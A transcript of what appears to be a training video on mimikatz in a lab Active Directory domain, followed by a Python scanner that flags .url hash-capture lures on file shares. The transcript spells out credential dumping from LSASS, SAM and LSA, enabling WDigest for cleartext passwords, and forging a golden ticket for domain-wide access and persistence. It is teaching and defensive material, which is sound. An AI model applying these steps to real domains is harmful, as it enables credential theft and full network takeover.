So it's very late here, and one thing you don't know is that I record my videos at night. So I work during the day, I spend some time with my wife, and then I find that anywhere from 10 o'clock to about 3 a.m. is the prime time to record videos, because the traffic on my street is insane. Well, I'm telling you all this because I'm a little bit tired, and this is going to be my second time now recording this set of videos on mimikatz, because I forgot to turn my microphone on. So forgive me for this, but we're going to go through it a second time, so it should be more well polished. So here we are, we're talking about mimikatz, and let's go ahead and just dive right in. What is mimikatz? Well, mimikatz is a tool that we can use to view and steal credentials. Now it steals these credentials that are stored in memory, and it can do a lot of nifty things beyond stealing credentials. It can generate Kerberos tickets, and it can leverage a lot of attacks, "just a few attacks," and that's kind of a joke: credential dumping, pass the hash, overpass the hash, pass the ticket, golden ticket, silver ticket. Now we're not going to cover all these in this course; that starts getting very, very deep, and here in a couple of videos I'm going to give you resources on where you can go find information on this and how you can get better and better on some of these things. But for now my only recommendation is just to cover what I think is important, again, for an interview, and then the more about this that you can learn, about these extra attacks that you're seeing here, then the better off you're going to be in your interview. But I don't want to overwhelm you with advanced techniques that's going to just possibly leave you confused, so we're going to keep it with the basics for now, and then you
can feel free to dive deeper once you have more comfortability in this topic so before we move on I do want to bring up the GitHub so go ahead and go to the GitHub page here for mimicats and just go ahead and Google GitHub meme cats and you should be brought here to this now mimikats is made by a gentleman named Benjamin delpe he's out of France so Mimi Katz I believe means cute kittens in French or something like that cute cats you might trigger an unsafe website because Windows does not like this most antiviruses do not like this and this is made to dump credentials on Windows right so there is a cat and mouse game that's going on right now with Windows and I'm going to show you how to utilize this tool we're going to talk about some strategies with it and we're going to play around with it the only caveat that I'm going to say is it's going to work here and now for the video by the time that you watch this and you download it there's a possibility that a patch on Windows might break it and then they have to update the patch on mimikat side and it's kind of a back and forth game but as of right now it's working and this is a tool again that is going to get caught you can see already unsafe website if you just download this and upload it to a machine chances are it's going to get picked up there are other tools out there that can utilize this one is called invoke Dash mimicats is a Powershell tool now you can either run that on disk meaning that you can upload that to a computer or you can run that via what's called IEX which is a way to just download files via Powershell and you can download and execute without ever actually touching the disk those are some Advanced strategies or just thinking more to the next steps that you might want to start looking into other strategies too are obfuscation and hiding that you're actually running mimikats now again as I said earlier in the course I can show you how to do that and how we do it nowadays but it's just going to 
become outdated it's this cat and mouse game and it changes all the time so I'd rather show you what the tool can do what it's capable of and let you do this research a little bit on the outside and learn what more attacks are out there last thing to point out so it says here that it is a well-known tool to extract plain text passwords extracts hashes PIN codes Kerberos tickets and it does all the attacks we talked about plus a lot more if you scroll down just a little bit come here to this I don't want to build it or if you don't want to build it binaries are available because this is in a sln file so you'd actually have to compile this we're just going to go ahead and click this if you're on edge it will report it so go ahead and just disregard this and right here we are currently on this 2019 uh November 11th or November 25th so go ahead and just download that you may have to download this um you may have to disable Defender if you download it directly to your machine or your antivirus my suggestion is to download it directly to your domain controller so go ahead and put this on the domain controller so from here on out what we're going to assume is we're going to assume that we have compromised a domain controller and we're going to talk about what we can do once we compromise it why we're doing that and what some attacks are that we can use for persistence specifically a golden ticket and what a golden ticket is capable of so let's go ahead and meet in the next video we actually explore what we can do with this tool and then we'll kind of take it from there okay so I am now on the domain controller and I have Mimi cats and the the three files that were in the x64 folder of the zip just extract it here to the downloads and I'm just going to go ahead and go into a command prompt and something I should point out too let me bring back up Edge is if you go up top to the wiki the wiki is a great place to learn a lot about Mimi cats and what it's capable of and all 
the different things that it has here uh so please please please look through the different modules that are available to you and exactly what they're doing so from here let's go ahead and I'm going to CD to my downloads folder and then I'm going to go ahead and execute mimicats.exe and it should bring up something that looks just like this so the first thing that we're going to do and this is the first step that you should always do is you should run this privilege and privilege is the module the first part is the module and then we're going to use two colons and then we're going to say divide and we're looking for a privilege 20 okay now debug means that it's allowing us to debug a process that we wouldn't otherwise have access to and this is per the wiki so we're going to attempt to dump some information out of memory right and if we're going to do this we need to be able to bypass this so if we don't we don't have the privilege debug on uh we're not going to be able to bypass these attacks or the memory protections that are in place especially for the LSAT the lsass.exe which we need to bypass protections on that to be able to dump the lsas and take the credentials that are stored there so we're going to run a few attacks against this so the first attack I'm going to show you is a very common attack so we're going to type in s-e-k-u-r-l-s-a and then we're going to do two colons here and we're going to type in log on passwords now for this one I want you to imagine that and not only are we compromising the domain controller here and I'm going to scroll up just a bit but imagine that maybe we just compromised a regular computer now the log on passwords when we dump this for a regular computer are going to show us the computer you see the computer username and the ntlm hash for that as well as any user that has logged in since the last reboot and that's stored here in memory all right so we're we're taking advantage of this stored in memory and say for example you 
saw earlier with man in the middle six where we actually used a computer to pull down information well it's possible that we have misconfiguration in our environment where a computer is capable of logging into the domain controller and running exploits so it's always good to check this hash and this hashes ntlm not ntl and V2 so we can pass this hash around and try to utilize it in attacks so this would be be taking advantage of Mimi cats past the hash feature so keep that in mind here the other thing that we're looking for is accounts that have logged in so let's scroll down until we find the administrator so the administrator is the only account I've logged in with on this domain controller and we also pull down the administrator's hash so if there was a machine where say for example a domain admin have logged into and it doesn't have to be the domain controller but that domain admin had logged into then we can possibly get their hash and use that to pass around and potentially we could take advantage of this W digest here so what is the W digest well it is a feature that on Windows 7 and before was enabled by default and what it did was it stored your password in clear text thank you windows from Windows 10 on they have patched it or Windows 8 on they attach this and what that means is they just turned it off the features still exist so what can we do we could actually turn on W digest with Mimi cats and then we can go ahead and wait for somebody to log onto the computer so it does require somebody to log off off or log out and then log into the computer but if we're patient or we're waiting through something for a couple days this isn't a bad idea to turn on W digest because that's a registry feature so even if they reboot the computer it's still going to come back on we go in there we wait we find the clear text password and then we're good to go so this is a really really useful uh tool that we can use here or a command that we can use so other commands that 
we can use and not all of these are going to work but one of them is trying to dump the the Sam so we can just say something like LSA dump and then we could say sam like this and try to dump that and this one doesn't work and that's okay sometimes it doesn't work we could try a Sam we could try patch see if that works that doesn't work okay let's try something else though so backing up just briefly just because we're not able to dump the Sam doesn't mean we're not able to obtain it in other ways we can get a shell with Metasploit and dump the Sam we can use secretstump.pi and dump the Sam we could also just download the Sam and dump it as well so uh just because mimikats can't do it here in this situation doesn't mean it's not something you shouldn't know and it's also something that you should know there's alternative options that you've seen already in the course so the big one that I really want to show you that I'm excited about is this it's LSA dump LSA and then we're going to say patch like this and watch what happens and I should note that the patch is important if you don't put the patch look so happy look what happens here so the patch allows us to actually get to the information so here you can see the information was coming out through an air now here we're actually able to dump the LSA so the LSA briefly is the local security Authority so what that is is a protected subsystem in Windows authentication and it authenticates and creates logon sessions to the local computer well we're on a domain controller and we're dumping the LSA here so this is one option that we can do now the other option is if we want to we can download or try to download the ntds.get remember this file from a long time ago what seems like forever ago in the course the ntds.dit will contain all the credentials as well but what we're looking at here is we're looking at usernames and ntlm hashes guess what we could take these hashes offline and try to crack them and we could try to 
crack these and this is important why do we do this there's okay there's two reasons we're doing this dump here one is we're going to take these offline try to crack these passwords if we're capable of cracking these passwords we need to know what percentage that we're capable of because you got to think in a real environment we're going to dump probably hundreds of different hashes and we're going to take those we're going to try to crack them and let's say we crack 10 or 30 well that is a number that we can relay back to the client and say look your password policy is either strong or it's weak or somewhere in between right if we're cracking 50 of the passwords we know that that client has a poor password policy if we're only cracking like one or two passwords then their password policy is pretty good and we can kind of identify uh what passwords were weak and how they can improve upon it but it gives a concrete number to the client to say hey look this is how bad your password policy is or how good your password policy is so this is one of the best practices that you will do as a penetration tester the other thing and what we're going to kind of lead into and why I'm showing you Mimi cats is we can run an attack called a Golden Ticket attack and I'm going to cover that in the next video but we need this Kerberos ticket granting ticket to be able to pull that off so we're gonna pause here and this is really the The Rundown for Mimi cats what I'm going to do when we're done with the next video is we're going to have one final video in this active directory section and I'm going to provide you a bunch of resources that are very very good for learning active directory so we'll cover some of the websites and then I'll put them all down in the description below so that way you have references for all these websites and you can go check them out and learn more about active directory pen testing at a deeper level so from here let's go ahead and talk about Golden Ticket 
attacks and I'll see you in the next video welcome to the last attack for the active directory section this makes me happy and sad because we're gonna have to leave it here so golden ticket is going to be at the attack we're actually going to use a Golden Ticket attack and surprise a pass the ticket attack as well we'll talk about both of those so what is a golden ticket and why do we care well in the last video you saw me dump the krb TGT account right what is that that's the Kerberos ticketing count the ticket granting ticket account that allows us to generate tickets well what if we have the hash of that account then guess who gets to generate Kerberos ticket granny tickets we do so with a Kerberos take a grinding ticket we can request access to any resource or system on the domain using the ticket granting service okay so what does that mean in layman's terms that means when we have a golden ticket we have complete access to the entire domain all the machines we can gain shells on them we can get all the files all the folders Etc so this is such a cool attack here so we're going to go ahead and try to pull this off so let's go ahead and do Mimi cats dot EXE and I'm going to show you the technique that I use when I do this so go ahead and Do Your Privilege debug as always and from here instead of doing the LSA dump LSA patch we're just going to say inject like this and we're going to pull down the actual user we want that way we don't pull down you know all the users we're just going to pull down one user so I'm pulling down by name and the krb TGT account go ahead and hit enter and when you do this go ahead and open up a notepad as well so open up a notepad and we're going to go ahead and scroll up we need a few things we need the Sid of the domain so go ahead and copy that and paste that in here and you need the ntlm hash of the Kerberos ticket granting ticket account so go ahead and copy that paste that in here as well the rest you should be good to go we're 
going to be able to generate our ticket based off of this so what we're going to do is we're going to do something along the lines of this so we're going to say Kerberos if it'll type Kerberos and golden like that the user here is I always like to put administrator you don't have to you could put fake user fake user123 whatever you want here it doesn't matter I can't type but it doesn't have to be a real user the domain does have to be real so domain here is marvel.local and then we need the Sid of the domain so let's go ahead and grab that and paste it here we also need the Kerberos ticket granny ticket account so krb TGT go ahead and grab that hash that we copied we'll right click there paste that and then we're going to supply the ID so ID of 500 here if it'll work sorry the copy paste messed up we'll do ID of 500. and that just stands for your rid so if you're familiar the rid is the admin account of 500. so we're going to use idea 500 and the last thing we're going to do is we're going to say PTT just like that so what does that stand for that stands for pass the ticket so we're going to generate a golden ticket here and then we're going to use pass the ticket we're going to pass that ticket along to our next session right or the current session and we're going to utilize that ticket to open up a command prompt and that command prompt is going to be able to access any computer we want okay so let's go ahead and do this we're going to pass the ticket generate this go ahead and hit enter and you see it says pass the ticket okay and it says golden ticket for administrator at marvel.local successfully submitted for current session current session so let's go ahead and do something like this miscellaneous and then command okay now we've got this command prompt up and we're utilizing the session and the golden ticket we just created now let's try to say something like dur and we can utilize something like we could try the Punisher let's see if it takes with the name 
resolution here C dollar sign and look at that we just did a directory of the Punisher uh from our machine we could take this further okay if we have PS exec downloaded to this machine PS exec.exe remember this is a tool used for Windows like this right we we can access computers with PS exec that was the whole intent of PS exec being created so we can download the windows tool of PS exec and gain access to this machine if we want to so that's going to be my challenge to you if you want to have some more fun with this take this a step further and go out go download PS exec so again all you're going to look for is PS exec.exe and that is a Windows tool so you should be able to find it on the Windows site download it and then run PS exec.exe and run it against this computer run it something like this Against The Punisher and then running against command.exe just like that and guess what you're going to get a shell on this machine this is an awesome attack you have complete control on top of this you can think of a golden ticket as persistence once you own the domain controller yes you can go add in a username and you can create your own account make them a domain admin a lot of places will pick up on that not everybody is picking up on the golden ticket quite yet and if you want to get stealthier look into what a silver ticket is that's starting to be the way to go now that golden tickets are starting to get picked up a little bit so what we're going to do is end this here that's my challenge to you go out download PS exec play around with it make this your own go out there and look at more mimikats commands learn all the different little tools and techniques you have the lab built for it everything is ready to roll so I'm going to cover in the next video some good resources for you to study we'll talk about a little bit about certifications and what's out there and then we're going to go ahead and move on and get out of active directory pen testing it has been a fun 
ride so I'll catch you over in the next video congratulations if you've made it this far you've made it through five hours of hacking material hopefully you found it all useful again if you are interested in checking out our Academy please feel free we do have the all access pass membership we have live training again just as a reminder we have the hacking and defending class coming up on September 16th along with the pmpt accelerated which does start on August 18th and we do have those two certifications we talked about the pjpt or the Practical Junior penetration tester and the pmpt certification both come with training both are around hacking active directory and they're great great certifications so that is it for this video again if you like it please do consider liking the video and subscribing to the channel so we can provide you with more awesome content thank you so much for joining me my name has been Heath Adams AKA The Cyber Mentor peace out
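The .url lure from the Responder part of the transcript, seen from the defender's side. This is an added example, not code from the course or from Responder: a scanner that walks a file share and flags Internet Shortcut files whose fields point at a network host, which is exactly what a dropped file has to do to make a client authenticate outward. The sample share, the attacker IP 10.10.10.5 and the file names are constructed for the demonstration; the hydra-dc allow-list entries reuse the lab's domain controller name from the transcript. A hit on a raw IP, or on a host the share owner does not recognise, is the thing to investigate, and the "@"/"~" prefix the transcript describes is reported as a supporting indicator only when such a remote path is present.

```python
"""Added example (not from the course): scan a file share for .url files
that point at a network host, the kind of lure dropped to make Responder
capture hashes. The sample share contents below are constructed."""
import configparser
import ipaddress
import os
import re
import tempfile
from dataclasses import dataclass, field

# A UNC path (\\host\share) or a file:// URL naming a host.
UNC_RE = re.compile(r"^(?:\\\\|//|file://+)(?P<host>[^\\/]+)", re.IGNORECASE)
# Names starting with @ or ~ sort to the top of a folder listing.
SORT_PREFIXES = ("@", "~")


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def parse_url_file(text):
    """Return the [InternetShortcut] keys (lowercased) from a .url file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:  # not an INI-style file at all
        return {}
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp[section].items())
    return {}


def remote_host(value):
    """Host named by a UNC path or file:// URL, or None for anything else."""
    m = UNC_RE.match(value.strip())
    return m.group("host").lower() if m else None


def assess(path, fields, local_hosts=()):
    """Reasons a .url file looks like a hash-capture lure (empty if benign)."""
    remote = []
    for key, value in fields.items():
        host = remote_host(value)
        if host is None or host in local_hosts:
            continue
        try:
            ipaddress.ip_address(host)
            remote.append(f"{key} points at raw IP {host}")
        except ValueError:
            remote.append(f"{key} points at unrecognised host {host}")
    if not remote:
        return []
    name = os.path.basename(path)
    if name.startswith(SORT_PREFIXES):
        remote.insert(0, f"name {name!r} sorts to the top of the listing")
    return remote


def scan_share(root, local_hosts=()):
    """Walk a share and return a Finding for every suspicious .url file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    fields = parse_url_file(fh.read())
            except OSError:
                continue
            reasons = assess(path, fields, local_hosts)
            if reasons:
                findings.append(Finding(path, reasons))
    return findings


def build_sample_share():
    """Constructed sample share: one lure, one ordinary intranet shortcut."""
    root = tempfile.mkdtemp(prefix="hackme_")
    lure = ("[InternetShortcut]\n"
            "URL=file://10.10.10.5/share\n"           # constructed attacker IP
            "WorkingDirectory=\\\\10.10.10.5\\share\n")
    benign = "[InternetShortcut]\nURL=https://intranet.marvel.local/policy\n"
    with open(os.path.join(root, "@Q4 financials.url"), "w") as fh:
        fh.write(lure)
    with open(os.path.join(root, "intranet.url"), "w") as fh:
        fh.write(benign)
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for f in scan_share(share, local_hosts={"hydra-dc", "hydra-dc.marvel.local"}):
        print(f.path)
        for r in f.reasons:
            print("  -", r)
```

Run it against a real share root instead of the constructed one and pass the names of the file servers that legitimately appear in shortcuts as `local_hosts`; anything left over is either a stale shortcut or a lure, and either way worth a look at who created the file and when.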